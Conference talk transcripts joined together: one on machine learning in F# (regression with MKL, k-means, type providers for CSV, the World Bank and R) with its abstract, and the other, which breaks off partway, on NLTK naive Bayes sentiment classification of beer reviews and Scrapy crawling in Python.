don't get every detail that's fine, I'm just explaining roughly what I'm doing: I created a data set. A nifty feature I really like here, maybe under-heralded, is this small thing: you can type #time, and I'll let you guess what it does — suddenly you have a timer. That's extremely convenient, even outside machine learning, because it gives you a nice way to start tuning your code and seeing where you're spending time.
Now, if you recall, the math book tells me how to compute my model, so I write it in F#, and sure enough it looks exactly the same: X transpose times X, inverse, times X transpose times y. That's nice — I take the math book, copy it over, and it just works. I run it, it cranks, and the timer tells me this took about five seconds (there's some information about garbage collection too, but that doesn't really matter). So it took five seconds to estimate my model. Good. One thing I can check is whether it's correct: if you recall, I created the outputs using a vector called true beta, and the result of my estimation is beta. If I take the difference between the two, everything should be zero — the vectors should be identical — otherwise the model isn't doing what I expect. So I check, just to make sure I'm not cheating you: I take every element, compute the difference, and look at the biggest one, and the biggest error is zero. The model gave me exactly what I expected — a perfect fit, in five seconds. Good. So the first reason people care about algebra is that it gives you very compact solutions; things that would be complex to express otherwise become a very short expression. That's not the only reason, though. The other reason is that — and sometimes there's an upside to people playing video games — games need graphics that go blazingly fast, and it turns out graphics also run on linear algebra and vectors. That's pretty awesome, because thanks to some of you playing Halo or whatever you play, the industry has put tons of effort into hardware that runs exactly that type of operation blazingly fast. So instead of doing the computation on the traditional CPU path in plain .NET, I can ship it to hardware that was built for this and reuse the goodness coming from the gamers — thanks, gamers. And it's extremely simple in this case: instead of using the default linear algebra provider, I switch to the MKL linear algebra provider. That says: when you see something that looks like algebra, hand it to a provider that actually knows about algebra and is much better at it. Then I run exactly the same operation as before — and I'll give you a hint: if the variable is called fastBeta, it's probably going to be faster. Bam. Before, we had about five seconds; now we're at about half a second. With one line of code, I cut my computation time by roughly 90%.
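A sketch of the whole experiment — the synthetic data, the normal-form one-liner, and the provider switch — assuming Math.NET Numerics (with its native MKL package installed for the last step); the sizes and names are just for illustration:

```fsharp
open MathNet.Numerics
open MathNet.Numerics.LinearAlgebra

let rng = System.Random(42)

// 5,000 observations of 500 features, and a random "true" model.
let X = DenseMatrix.init 5000 500 (fun _ _ -> rng.NextDouble())
let trueBeta = DenseVector.init 500 (fun _ -> rng.NextDouble())

// Outputs built as an exact linear combination of the inputs.
let Y = X * trueBeta

// #time;;  (in F# Interactive: toggles the timer mentioned in the talk)

// Ordinary least squares via the normal form, straight from the math book.
let beta = (X.Transpose() * X).Inverse() * X.Transpose() * Y

// Largest gap between the true model and the estimate - should be ~0.
let worstError = (trueBeta - beta).AbsoluteMaximum()

// Switch the linear algebra provider to native MKL and redo the same work.
Control.UseNativeMKL()
let fastBeta = (X.Transpose() * X).Inverse() * X.Transpose() * Y
```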
And that's nice — hello, gamers, they give me a massive speed-up — and this is probably the most trivial thing you can do; MKL is not even the craziest option. The really crazy people use GPGPU, and F# has a great story there too. F# historically comes from OCaml, which comes from ML, and the name ML comes from "meta language": these languages were created for compilers and code analysis, and they're very good at compiling to other targets. Of course, every language today has a compiler to JavaScript, so yes, F# has one of those — but there's also a compiler to CUDA, to the GPU. It's a commercial product called Alea.cuBase, and it's completely awesome: if you want to target the GPU, instead of hand-crafting C code you write high-level, generic F# and it compiles straight to the GPU and runs blazingly fast. If your daily life is writing accounting applications you probably don't care; if you're doing neural networks and deep learning, this is the kind of thing that makes people's eyes light up, because it can mean a huge speed-up on something that would otherwise take a couple of days. And I think that's what I have on regression so far — do you have questions? [A question from the audience.] No, I haven't — I wish; maybe next time I'll do that. So let me go back to the slides for a second. The takeaways from this section, the things I hope I conveyed, are the following. One: F# is a first-class citizen in .NET. I mention this because people sometimes have the impression that F# is some separate, alien language; it actually works really nicely — anything ever written in C# works in F# and vice versa, so you can reuse a ton of stuff. Two: even though .NET is not Python — we don't have the same length of history in machine learning, and maybe nothing quite as deep as scikit-learn — there are already plenty of good tools. Accord.NET has everything you'd expect in a first pass: logistic regression, support vector machines, neural nets; the basic toolbox is there. You have Alea.cuBase, and you have a good linear algebra library. So it's not like you're naked in the jungle with just a knife — you have things to use. Three — the thing I really care about — is the interactive experience with the REPL. If you don't have one, your day is going to be miserable; if you have one, your day is going to be possibly miserable, but at least one of the miseries is gone.
I know not everybody agrees with this, but I would argue that syntax matters, and that's why I showed the algebra case: if I work on a problem that's about matrices and vectors, I would like my code to look like matrices and vectors, and that's what you get with F#. Because it's functional and closer to math, the code ends up much closer to the kind of thing you typically write in machine learning, so it's easier to understand. Finally, on the machine learning front, I hope I've given you a sense of what classification is, what regression is, and what cross-validation is about. That closes the first step of my journey; the next step is unsupervised learning, and besides illustrating what that is, my point here will be that functional programming and machine learning are a really nice fit. In the first part, what we did was: we have a problem, we use a library, it works, we're happy. Sometimes, though, you'll have to write your own. In general, when a software engineer tells you "there is a library, but I'm going to write my own", that's a red flag — it's usually not a good idea — but it actually happens quite a bit in machine learning, for a few reasons. One of them, and it's part of what makes the field interesting, is that while most software engineering builds on research from twenty or thirty years ago, in machine learning it's not uncommon to meet people working from a research paper that's three months old. If it's three months old, chances are nobody has implemented it, and if nobody has implemented it and you want it, you'll have to do it yourself. The other reason is that stock models — like the support vector machine we used — are nice, but as you gain knowledge of your domain you may hit the point where you need to tweak and customize your model, and the classic out-of-the-box model won't do. So it's not unusual to have to write your own. And if you do — I end up doing it fairly regularly — you'll see that most algorithms have the same general structure, with variations. One: read data, because without data you won't learn much. Two: take the raw data set and shape it into what you actually want, what's called features. Three: pass the features to something which learns, and keep learning until you're satisfied. Four: once you're done, evaluate how good your model is, typically with cross-validation against held-out data. And these steps translate really well into a functional programming style. Reading data is reading data — and F# actually has something nice on that front, which isn't especially functional, that I'll show later. Shaping the data into features is exactly what a map is: take a collection, apply a function, get features — a core concept of functional programming. Fitting a model against the features is "learn until the model is good enough", which is a straight fit for recursion, also bread and butter of functional programming. And evaluating the model — walking a validation set, computing a metric, accumulating the results, like counting the ones and zeros we did earlier — is a fold, again straight-up functional programming. So in the end, pretty much every implementation I write has that shape: a map at the beginning, a recursion, then a fold, and you're done.
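As a very rough illustration of that shape — every function and file name below is made up for the sketch — a hand-rolled learner tends to look something like this:

```fsharp
// 1. Read data.
let rawData = readData "my-dataset.csv"

// 2. Shape it into features: a map.
let features = rawData |> Array.map extractFeatures

// 3. Learn until the model is good enough: recursion.
let rec learn model =
    let improved = improveModel model features
    if goodEnough improved then improved else learn improved

let fitted = learn initialModel

// 4. Evaluate on held-out data, accumulating a metric: a fold.
let quality =
    validationSet
    |> Array.fold (fun total example -> total + score fitted example) 0.0
```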
That's nice, because the problem translates and maps really cleanly onto the language. The other reason I think functional programming works well here is that you're always changing your model: you have an idea, it works, then you have a new idea, so you start changing the features, and so on. If you're iterating that rapidly, you can't afford to rework a domain model all the time — the last thing you want is a pile of classes you have to keep tinkering with. That style, in my opinion — or at least in my experience — doesn't work very well here. Instead of forcing a domain model onto your algorithm, what works much better is to take the data the way it is and just apply functions to it; you can manipulate the functions freely, you don't touch a domain model, and it works very nicely. I said I'd talk about unsupervised learning. Supervised was: I have a question, here's the data, do the best you can to answer that question. Unsupervised is the opposite: I still have lots of data, but I don't know exactly what I want to know about it. It's unsupervised because you give the computer the data and you hope it comes up with something interesting. One of the classic examples is clustering. Clustering would be: I have a data set about my clients, maybe the history of my products, and I'm trying to find patterns — similar products, similar clients; maybe women shop differently from men, maybe older customers behave differently from younger ones. You're trying to see whether there are clusters of items in your data set. One way to do that is the k-means algorithm. Imagine this is your data set — clearly a tiny one, just for illustration — and when I look at it I see two clusters: a bucket of points on the left and a bucket on the right. So let's see whether the algorithm can recognize those two clusters.
To do that, I start by creating what are called centroids — the big markers in the middle (I think they're orange; I'm a bit colour-blind, so I never know which colour is which). I'm saying: suppose I have two clusters. The first step is to take every element in my data set and assign it to the closest centroid — that's a map: take element one, map it to a centroid, and so on. In this case, all the points on the left became, I believe, red, and all the points on the right became blue; I assigned them to the two different centroids. The next step is to update the centroids so they get better: now that I know which points belong to centroid one, I move centroid one to the middle — the average — of that cluster, and I do the same for the other one. Finally, I look at whether the result changed. If the clusters didn't change, there's no reason to keep going, because it will stay the same forever; if they did change, I keep going until nothing moves any more. That's a recursive function: do it, do it, do it, until it stops changing. And that's how the k-means clustering algorithm works at a high level.
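A rough sketch of that loop — the data representation (plain float arrays), the distance function, and the handling of empty clusters are all simplifying assumptions, not the code shown in the talk:

```fsharp
// Squared Euclidean distance between two observations.
let distance (a: float[]) (b: float[]) =
    Array.map2 (fun x y -> (x - y) * (x - y)) a b |> Array.sum

// Mean of a group of observations, component by component.
let average (points: float[][]) =
    Array.init points.[0].Length (fun i ->
        points |> Array.averageBy (fun p -> p.[i]))

let rec kMeans (data: float[][]) (centroids: float[][]) =
    // Assign every observation to its closest centroid: a map.
    let assignments =
        data |> Array.map (fun point ->
            centroids |> Array.minBy (distance point), point)
    // Move each centroid to the average of its cluster.
    let updated =
        centroids |> Array.map (fun c ->
            match assignments |> Array.filter (fst >> (=) c) with
            | [||]    -> c
            | members -> members |> Array.map snd |> average)
    // Recurse until nothing changes any more.
    if updated = centroids then centroids else kMeans data updated
```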
So now I'm going to jump back to code. I also want to show you something I started building with a friend: the project is called VegaHub, and the intent is to be able to rapidly visualize charts. Try it at your own risk — it would be charitable to describe it as alpha quality — so there's a decent chance everything explodes during the demo, which spices things up a bit, but I like to live on the edge. We'll take a classic data set — what it is doesn't matter much — a set of flowers: three types of iris, setosa, versicolor and virginica, with measurements for each flower like sepal length and sepal width, whatever that means; I'm not a botanist. What I want is to see whether I can find clusters in that data set. The first thing I do is resize Visual Studio, read the data into a small type I created — not very interesting — and fire up VegaHub. That should open the browser... victory, it didn't bomb, I'm very happy. Under the hood this uses D3, Vega and SignalR, and now that the browser is connected I can start sending things to it live. For instance: give me a scatter plot, take the data, x is petal width, y is petal length, use the class for colour and the other measurement for size — and that's the kind of thing I get. This is also nice because I have types, so IntelliSense shows me which variables are available; I can switch to another one and see how that looks. Hopefully — I'm still colour-blind — you can see three different colours, three clusters on the screen. What I want now is to apply my clustering algorithm and actually find those three clusters. I'll speed up a bit for the sake of time, but if you look at the code, which is online, you'll see it maps pretty much directly onto what I described: the clustering has two steps — assign the points to centroids, update the centroids — repeated recursively until it's done. It's not a completely trivial algorithm, and it's only about 25 or 30 lines of code. Now I apply it to the data set, and... did you see that? I'm going to do it again, because I like moving things. You should still see three colours, three clusters, plus big blobs — those are my centroids — and you can see them moving as the algorithm updates, heading to the right places; you can watch the algorithm making progress. And that's what I have on clustering; I'm very happy it didn't explode. I rushed a little because I want to leave enough time for type providers, which I think are a big deal. If you recall the steps of an algorithm, steps two and three do things with data — but there's a step one, and step one is: get the data. When you listen to people talk about machine learning at meetups, they talk about parallel algorithms and GPUs and whatever the latest craze is, and nobody tells you the dirty secret, the sad truth: you're not going to spend most of your time creating fancy algorithms. If you do machine learning, you'll spend most of your time cleaning up data and getting data you can actually work with. That's the unsexy, janitorial part of machine learning; it's really time-consuming, and it's really important, because if you have no data, you have no learning. And that puts you in front of a trade-off. It's nice to write code in the language of your choice, where you have your compiler and your types and everything is as you expect — but you're trying to get data from the rest of the world, maybe a CSV file, maybe SQL, maybe JSON, and none of that lives in your type system. Your program doesn't know anything about your classes; to it, that JSON is just a piece of text. So now you have a choice between two options, and neither of them is much fun.
The first option is to say: fine, I'll mostly ignore types and use a dynamic language — and I think that's part of why people like Python. The upside is that without much in the way of types you can hack at whatever you want and be optimistic. The downside is that the compiler isn't doing much for you: the only way to know whether it works is to run it and see that it doesn't explode — that's the best you get. The other option is a language like C# with static types, and the benefit is the opposite: it's safe, the compiler helps you — "you told me this should be an int, it's actually a string, something's not right". The problem is that to get there you typically need something like an ORM — I'm sure you're all fans of Entity Framework — and tons of scaffolding. So that's not fun either: I have two bad solutions to choose from. And this is where type providers are absolutely awesome: they resolve this almost magically, and you get the easy hacking you'd have in Python together with the performance and safety that come from static types. Rather than talk more about it, I'm going to demo type providers, going from the obvious ones to the crazier ones. The prototypical use for a type provider is data that has some form of schema. A type provider is a mechanism — a bunch of them ship out of the box, there's a big open-source library of them, and the really nice thing is that you can write your own: if you have a schema and you want a type provider for it, it's an open, extensible mechanism. The way it works is that the provider looks at a schema, decides "given what you gave me, I think these are the types you mean", and creates everything for you. (And yes, Visual Studio just did something unexpected there — that was a surprise — but we're back.) So I'm going to open FSharp.Data, which is the biggest open-source collection of type providers, and start with the most obvious example. In any project, at some point you know you're going to hit a CSV file — it's the granddaddy of all NoSQL storage technologies; sooner or later the accounting department spits out a CSV at you. I'm sure all of you have written a CSV parser at some point. It's not very difficult, but it's also a bit of a waste of time, and this is where a type provider is nice.
I'm going to use the CSV type provider to look at a file which is the passenger list from the Titanic — not that I'm particularly morbid, but I do like this data set. The file has headers: a passenger id; did that person survive; were they in first, second or third class; age; and so on. I can see that "survived" is a zero or one, so it's probably really a boolean encoded as 0/1; I can see there are doubles, strings, missing data — your bread-and-butter, painful file to deal with. You could go ahead and write your own parser, or you could do this: use the CsvProvider, point it at that CSV file, and it creates a type — call it Titanic — done. Then I can load the data, grab the first row, and type first dot... (come on... the magic is not happening... ah, here we go — it was just doing it lazily, I guess). Under normal circumstances — let's say you saw it happen — what you get is a full type with properties, and the properties have the right types: Survived is a boolean, the doubles are doubles, and so on. Your parsing is done. And you have that kind of type provider for JSON, for XML, for SQL — all the classic cases where a schema describes the data.
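A sketch of that step — the file name and the exact column names (Survived, Pclass, Age, ...) are assumptions about the Titanic file, and the provider infers a sensible .NET type for each column from the data itself:

```fsharp
#r "FSharp.Data.dll"
open FSharp.Data

// The static parameter points at a sample file; the provider reads its
// headers and generates a typed row for it at compile time.
type Titanic = CsvProvider<"titanic.csv">

let passengers = Titanic.Load("titanic.csv")
let first = passengers.Rows |> Seq.head

printfn "Survived: %A, Class: %A, Age: %A" first.Survived first.Pclass first.Age
```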
Then there are providers which are a bit more exotic, and the World Bank type provider is a good example. The World Bank is this institution which, besides doing whatever it is banks do, is known for collecting tons of statistical information about countries all over the world — economic data and much more — and the type provider puts all of that at your fingertips. After Visual Studio decided it needed a restart, here we go: in one line I create a data context, and that data context connects live, over the wire, to the World Bank — no magic, no configuration. If I type worldBank dot, it shows me: the World Bank can give you countries, regions, topics. I take countries, and countries dot helps me discover what's available: Afghanistan and so on... let's say I'm in Norway, and I don't actually know much about Norway, so Norway it is. What do I want to know about Norway? Let's start with the capital city — and this goes over the wire to the World Bank, gets the list of countries, finds Norway, and returns the capital city, which I believe is correctly reported as Oslo. That's neat, though the capital city isn't exactly mind-blowing. The part that's more interesting is the indicators: I can write countries, Norway, indicators, and start browsing what I could ask about. The benefits going to the bottom 20% of the population; the DEC alternative conversion factor, whatever the hell that is; all the way down to the bank z-score. I have something like two thousand series here. If I ask, say, for population — the population of Norway in 2005 — it goes over the wire again and tells me it was about four million people (returned as a float, just in case there's half a person in there). I don't know if it's true, but it sounds about right. So that's starting to be genuinely cool, and the impressive part, if you think about it, is that it's going over the wire and creating classes and types for you on the fly — no ORM, no scaffolding, nothing. My head melts every time I think about what's happening here.
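In code, the World Bank steps look roughly like this (it's part of FSharp.Data; the exact indicator name below is an assumption — in practice IntelliSense lists the available series):

```fsharp
open FSharp.Data

// One line: a data context that talks to the World Bank over the wire.
let wb = WorldBankData.GetDataContext()

let capital = wb.Countries.Norway.CapitalCity

// Indicators are exposed as properties; years are indexed.
let population2005 =
    wb.Countries.Norway.Indicators.``Population, total``.[2005]

printfn "Capital: %s, population in 2005: %.0f" capital population2005
```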
And you can push the idea further. Data has a schema and I can get types for it — but a language also has something like a schema, so why not do the same with other languages? Someone at BlueMountain decided you could build a type provider for R. R is a statistical package, a language created by statisticians for statisticians — as a language it's pretty awful, but it does awesome things for statisticians — and with the R type provider I can use R from within F#. It shows me which packages I have: Matrix, boot, graphics and so on. R is suddenly, magically available inside F#, and I get the benefit of types on top. That's pretty cool, because I can start merging it with F# code. For instance, I create a list of random numbers — an F# value — and send it to R, and in a second a little window pops up and boom: I'm talking to R live, seamlessly, from F#. And here's the really nice part. You might say, fine, but why use R from F# instead of just using R? The answer is that from R alone I can't use the other type providers. From F# I can say: take every single country from the World Bank, pull the population in 2000 — that happens over the wire, nothing to set up — put it into a data frame, and hand it to R. Now I get the best of both worlds: data from JSON, data from the World Bank, data from wherever, combined with R's plotting; a little blink tells me R has done its job and I get my map out of it. Think about the amount of work it would take to do this any other way. I like the map in R, I like the data from the World Bank, I can take whichever piece I want from either side and it all just works — and where in Python I'd probably make typos all the way, because I type poorly, here I get the compiler and IntelliSense helping me. This is really brilliant. I really love type providers.
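A sketch of the R side, assuming the RProvider package (the plotting call uses R's standard graphics package; the World Bank/data-frame/map part of the demo is left out here):

```fsharp
open RProvider
open RProvider.graphics

let rng = System.Random()

// An ordinary F# list...
let values = List.init 100 (fun _ -> rng.NextDouble())

// ...handed straight to R, which pops up a plot window.
R.plot(values)
```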
stuff: there's going to be Xamarin with F# with Rachel Reese, Quake with F# with Wil Smith, and there will be something awesome and airline with an italia ticina later. So if you enjoyed what you saw, stay, and there will be more in different directions. And get involved: the community is awesome, go to fsharp.org and find us on Twitter. And if you loved it, or if you hated it, you can rate me using the cards; it's a test, so I'll give you a hint about what the right answer is. That's what I had for you. If you want to contact me, this is me on Twitter, this is my email, so come talk to me. And thank you guys for coming this early today, I'm super excited. Thank you.
|
While Machine Learning practitioners routinely use a wide range of tools and languages, C# is conspicuously absent from that arsenal. Is .NET inadequate for Machine Learning? In this talk, I'll argue that it can be a great fit, as long as you use the right language for the job, namely F#. F# is a functional-first language, with a concise and expressive syntax that will feel familiar to data scientists used to Python or Matlab. It combines the performance and maintainability benefits of statically typed languages, with the flexibility of Type Providers, a unique mechanism that enables seamless consumption of virtually any data source. And as a first-class .NET citizen, it interops smoothly with C#. So if you are interested in a language that can handle both flexible data exploration and the pressure of a real production system, come check out what F# has to offer.
|
10.5446/50783 (DOI)
|
Hi, welcome everyone. This is really time of the day when you guys are probably quite tired from going to talks all the time. And here I am, the only thing that stands between you guys and the party that is going to be going on downstairs. So I tried to do something about that. I think this is a talk about B, but it's also a talk about making sense of unstructured data. So we're going to keep a theme. My name is Anders Noras. Nice to see you guys coming up here. I work for a company area now called Etara. If you want to know more about us, you can visit our booth down in the expo area. So yeah, as I said, this is a talk making sense of unstructured data. It's using lots of those things that some of you might have studied in uni, which is natural language processing and computational linguistics. I don't know, has anyone studied that? Yeah, there's at least one guy in the room. I figured I'd switch that around because those talks, I've been to a few, they are very academic and they give you sort of insights into the maths and stats behind things. And where do they sell them? Do they show how to actually use these things for proper applications? So since I'm not all that good at maths, I figured I'd do the latter and actually show some real scenarios for this. So we're going to be using some familiar tools. I wrote a tweet the other day that I was in the process of rewriting all my examples to Swift since I had been planning to use Python and when Apple came up with the Swift language, they claimed that it was so much faster than Python, so naturally I would use that. That was all just a joke though, I'm going to use Python for this. And there is a reason for using Python. Python has sort of a history to it within the field of scientific computing and language processing. And I've been asked a few times why that is. And I think it's probably got a lot to do with Google hiring lots of Python developers back in the early noughties to work on their data processing. So they were really pushing forward data processing on Python. And at the same time you had libraries such as NumPy and Psypy which brought lots of the scientific community over to Python. Because they were used in things like MathLab and making the jump to Python was much easier than going to anything else. Now there is probably a very good reason that you're not using a static language like C sharp or Java for this because some of the computations that are going on behind this are really hard to implement in that sort of language compared to the dynamic languages. But it might as well have been Ruby. And the reason why Ruby didn't end up there, you do have some libraries for this, but Python is where you have the best ones. And just to speculate, I guess that is because Ruby was a web framework or a web language for developing Rails apps. But that's changing as well. So you get much easier to do this there as well. But we're doing Python today. It doesn't really matter if you know Python or not because the examples we're going to look at are pretty straightforward. But we're going to look at some concepts. So for the one guy who had studied this before, it's probably going to be a rather familiar. And hopefully for you as well, we're going to see some interesting examples. So this is really the thing that is big data all the way. And this is actually a beer that's available in San Francisco. It's a big data API. It's an imperial paylale. It's not really this. It's someone who photoshopped this, but it's still kind of funny. 
So we're touching on that big data thing. We're not going to process vast amounts of data today, but we're going to do something. I want to introduce you guys to a framework called NLTK, the Natural Language Toolkit. Has anyone used this before? You have? Good. This is probably the industry standard for doing these things. It's very commonly used, it's very mature, and it's used a lot in research work, but also in other applications. So I'm going to show you some code just to introduce what this actually is. The first thing we need to do is import this thing. Then let's create a sentence, which could be something like: I drink craft beers that haven't been brewed yet. So now we have that. One of the simple things you can do is tokenize this sentence, which is to split it into its words. That's NLTK's word_tokenize, and it's the basic functionality for this; there are other, more advanced ways of doing it as well, but we're going the easy route for now. We can also tag the tokens with part-of-speech tagging; if that's a totally unfamiliar concept to you, you'll see it in a second. We just feed those tokens into the pos_tag function. Thanks. Yep. It's nice if you tell me these things, because I can see all of you pretty well, but it might not be as easy to see my stuff. Sorry. No, I can't, but I'll make things full screen a bit later; this is in the middle of my slide deck. So I'll just print the tagged words. Here is that sentence divided into its different words. One thing you might notice is that the n't ending has been tokenized as a separate word. The first thing we have is a personal pronoun, I, which is similar to he, she, it, and so forth. The second thing could be either a noun or a verb, but in this case it's a verb, and that's determined from the sentence structure; it's also a word in the present tense, but not in the third person. Craft is a singular noun, beers is a plural noun, that is something called a WH-determiner (we could substitute which for it and the sentence would still sort of make sense), then we have yet another verb, an adverb, not, a verb in the past participle, brewed, ditto for been, and an adverb to finish. So we sort of get the sentence structure out of this. We can do lots of things with that, but today we're actually going to do some simpler things. We're not going to work on the actual sentence structure, but we're going to do something related to it, just to start with. Does anyone recognize what this is? Yes, I need someone to help me with this. So, does anyone want a beer? There's one in the back there. There's an opener there as well. Anyone else? There's a guy over there. Could you throw that bottle opener over to him afterwards? So yeah, it's Bayes' theorem. For those who aren't familiar with it, this is probably something like the Pythagoras theorem of this area. It's the one thing people talk about at the very beginning, and it's very widely used; the common example is things like spam filters, which use this. And the concepts of Bayes are very central to what we are going to be doing later on today. So you guys kept the beer caps? Yep, good. We have to play a game of pretend here, because they don't look exactly like the ones I have up on the screen, but they're similar, aren't they?
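A minimal sketch of the tokenize and POS-tag steps described above, assuming NLTK and its standard models are installed; the tags shown in the comment are approximate, not a guaranteed output:

```python
import nltk
# First run only, if the models are missing:
# nltk.download('punkt'); nltk.download('averaged_perceptron_tagger')

sentence = "I drink craft beers that haven't been brewed yet"

tokens = nltk.word_tokenize(sentence)   # note how "haven't" splits into "have" + "n't"
tagged = nltk.pos_tag(tokens)
print(tagged)
# roughly: [('I', 'PRP'), ('drink', 'VBP'), ('craft', 'NN'), ('beers', 'NNS'),
#           ('that', 'WDT'), ('have', 'VBP'), ("n't", 'RB'), ('been', 'VBN'),
#           ('brewed', 'VBN'), ('yet', 'RB')]
```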
Yeah, good. So we have two bear caps, right? One of them has logo on both sides, and one of them is blank on the other side. So you're on the left-hand side or right for you guys on that side. You have this one, not that one, but this one with logo on both sides. You have this one. So let's do a little experiment, which is what you use this thing for. So we have two possible coins, one two-sided and one single-sided. So this has some possible outcomes. So if you have the two-sided bubble cap, you have the single-sided. No, you're going to pretend that it's two-sided. Can you manage that? I always have to give your bear to someone else. Does anyone else want to bear? Yeah, there's one there. Okay, you were really fast. The girl in the back wants one. She's taking precedence. You have to give her the bubble opener. But I was lost when I had. There was a booth down who had really good bear. So, yeah, so when you flip yours, you can either have logo or logo. While it's where you flip yours, go ahead and flip it. There was no logo. You have to flip it first, though. You're going to just hold it in your hand. That's too lacy. Yeah. So just flip it and call out what you got. You dropped it. You got a blank one. No logo. Blank one. Exactly. So you either get a blank one or a logo. So we can feed this stuff into bias theorem and say that yours is a fair one, since you have two different options, while yours is sort of biased. So for a fair flip, we had a logo which gives this one to three chance. That is going to be a fair flip if we choose one of those at random. So we can go ahead and repeat this experiment. You're all pretty clever. So you know that you're kind of screwed. You get the same thing all the time. Whereas you can get a blank one. You got a blank one again. Very good. So the odds of that is really one to five if we have two instances that we have observed this. And it goes on like this. So reverend bias walks into a bar because he was actually a reverend. And he, as I've heard, that he came up with this theorem to prove the existence of God, which he didn't manage. But we can use this for some more interesting stuff. So let's head on over here. Is it readable for you guys, or should I crank up the font a little? Bit bigger. Okay. I'll just have to head into the preferences here and the font. So like 200 points is probably, are we doing it? 20. So let's go grab NLTK again. And we're going to have some bear reviews. And we need to have some positive ones. I type pretty fast, don't I? And we need to have some negative ones. So negative reviews. Like that. And let's just create a collection of all those reviews. And we're going to do that by creating tuples of words and sentiments for those words. And we're going to take all the positive reviews and all the negative reviews and just iterate through those. And filter them. So we're going to come into lower case just to have some sort of uniformity to them. And then we're going to do word in words. And we're going to split those on spaces. And we'll just keep the words that have some length to them. So let's say, I have an extra parent, sorry. But that, which are three letters are longer. So, and we'll, we can print the print those. Sorry, need to print. Let's just print the reviews just so you can follow along and see what we have. So I'm going to run this now. And I have a typo. Words not defined. Yeah, thanks. No, not word lower. But we are, we need to append something to the reviews as well, don't we? 
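Before the review-building code continues, the bottle-cap numbers quoted a moment ago (a one-in-three chance after a single logo flip, one-in-five after two) fall straight out of Bayes' theorem. A quick check, assuming a 50/50 prior over the two caps:

```python
# P(fair cap | n logo flips in a row), with a 50/50 prior over the two caps.
prior_fair = prior_biased = 0.5
p_logo_fair, p_logo_biased = 0.5, 1.0   # the double-logo cap always shows the logo

def posterior_fair(n_logos):
    fair = prior_fair * p_logo_fair ** n_logos
    biased = prior_biased * p_logo_biased ** n_logos
    return fair / (fair + biased)

print(posterior_fair(1))   # 0.333... -> the "one to three" chance from the talk
print(posterior_fair(2))   # 0.2      -> "one to five" after two logos in a row
```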
So we're going to append our filtered words and our sentiment and we're going to make that a tuple. So let's just add a set of parents around it. Here we go. So we just get an array of words that are in each review and they're tied with either positive or negative. Rather simple for now. So let's get a function that we can use to just grab all the words from the reviews. So say that we pass this reviews array we got up there into this and fish out all the words. So let's do for words and sentiments in reviews, which is what we expect to have in there. Let's just put that into the all words by extending that array with the words only. And finally just return all words. And just to see what we have, let's probably have a plural name on this. Get words and reviews and pass it to reviews. Run this again. Did we get anything? Yeah, we have a line. So this is interesting, but what we are curious about are really the features that are available in these reviews. So let's define a function as well for extracting the features of the different sentences. So let's create a function that takes a word list and changes that into a frequency distribution using an LTK for that word list. And then get the features by grabbing the word list, not the filtered. All the keys from that. And then return the word list. So I do. And then let's just assign that to a variable. So let's get the word features from get words and reviews, reviews and finally print that. And this is going to be a data structure. So let's use print to print. In line 19 words list. Thanks. Like so. And just import print to print. And with an indentation of three. So these are our different word features of the entire corpus of reviews we now have. So we need to have sort of a concept of a document, which is a single review. And from that we're going to extract features using a extract features method. So the document words are what we are interested in is just a set containing the document. And the features will be a hash. And all we need to do then is for each word in the words. The word features array, sorry, will just create a key in the hash that says contains and the string and interpolates the word in there. Word in document words. And finally return the features. Well, misspelled this. Let's just keep it as a feature not to. Finally, we have to do something that is the boring part of this. That is to create a training set. This is what you usually spend the most time on and we'll see examples of that in just a second. So you can apply features function with extract features. And the reviews. And again, pretty print. The training sets to see what's in it. So we get this set that if it contains beer, absolutely true, blah, blah, blah, so on and so on and so on. We have all the different combinations of features that these sentences can have. Classification and the way we're going to do that is that we're going to create a classifier. It's just means that it's there or not. So we haven't come to whether it's positive or not yet. So a classifier and that is going to be a naive bias classifier and always do that. And we're going to train this on the training set that we just created. And just to see how that looks after you have a trained classifier, we're going to print the most informative features. Let's just take the 20 topmost. So now we have this table where whether it contains these different words and you have the weights for whether it's a positive review or whether it's a negative review. 
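Pulling the fragments of this walkthrough together, the whole Naive Bayes pipeline is roughly the sketch below. The review texts are placeholders rather than the exact ones typed in the session, but the NLTK calls (FreqDist, apply_features, NaiveBayesClassifier) are the standard ones being described:

```python
import nltk

pos_reviews = ["Super excited about this beer", "This beer is fantastic"]
neg_reviews = ["This beer tastes bad", "Do not want this beer"]

# Build (word list, sentiment) tuples, keeping lower-cased words of 3+ letters.
reviews = []
for text, sentiment in [(t, "positive") for t in pos_reviews] + \
                       [(t, "negative") for t in neg_reviews]:
    words = [w.lower() for w in text.split() if len(w) >= 3]
    reviews.append((words, sentiment))

def get_words_in_reviews(reviews):
    all_words = []
    for words, _sentiment in reviews:
        all_words.extend(words)
    return all_words

# A frequency distribution over the whole corpus gives us the word features.
word_features = list(nltk.FreqDist(get_words_in_reviews(reviews)).keys())

def extract_features(document):
    document_words = set(document)
    return {"contains(%s)" % w: (w in document_words) for w in word_features}

training_set = nltk.classify.apply_features(extract_features, reviews)
classifier = nltk.NaiveBayesClassifier.train(training_set)
classifier.show_most_informative_features(20)

print(classifier.classify(extract_features("super excited about this beer".split())))
```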
And once we have that, we can actually start using this for classification. So let's just print classifier and call the classifier method and hand off to the extract feature and say something like, I'm this one. It's a very good bear. So I'll say super excite. I shouldn't choose so difficult word should I excited about this bear, which I suppose is a positive statement and disagrees. Let's do a couple more. This bear tastes yuck. And do not want this bear. You get picture will stick with those two. And it's positive. It shouldn't be tastes bad. Let's change it. It's positive again. You know what? It's probably a type of earlier up. I have this little neat trick I can do. I just rewrote this really quickly and change the training set back to something proper. So the only thing that's changed is this thing up here. So I probably mixed up the positive and negative reviews in the first iteration. But it's trained on the same similar data. It's done the same way and it's able to determine different properties. So that's basically a one on one example of by years. But another interesting thing is that we need to have some data to work on. So I figured since this is all about beers, a good source for really unstructured data is blogs. There are quite a few like balding, reclining hairline men that are writing about beer out there. But the thing is that these blogs, they have all things going on in them at the same time. So it's highly unstructured information. And this is what I find interesting is to see can we take something like this and get something from that. The first thing we need to do then is that we actually need to go out and gather some data. And for that I'm going to be using a framework called Scrapey. Is anyone familiar with Scrapey? Yeah. It's probably one of my favorite web crawling frameworks out there. And it's basically built to scrape information off websites. So it's intended to be used in a very structured way. Where you have a structured page that I can go to this element and get that information or go there and get this thing. And what you do is that you build up a collection of different items. Now, for something like these blogs, they are very, very unstructured. So you can get some things like a title. And you can grab all the links and things like that. But the actual content, the information is hidden within there. And you can't just go off with a CSS selector and go grab the essential content from there. So we have here a small little spider that runs off to a set of predefined domains where it starts. And sticks to those. So it has a list, maintains a list of allow domains to visit. And then just doesn't work on the query strings, but the important part of this down here were 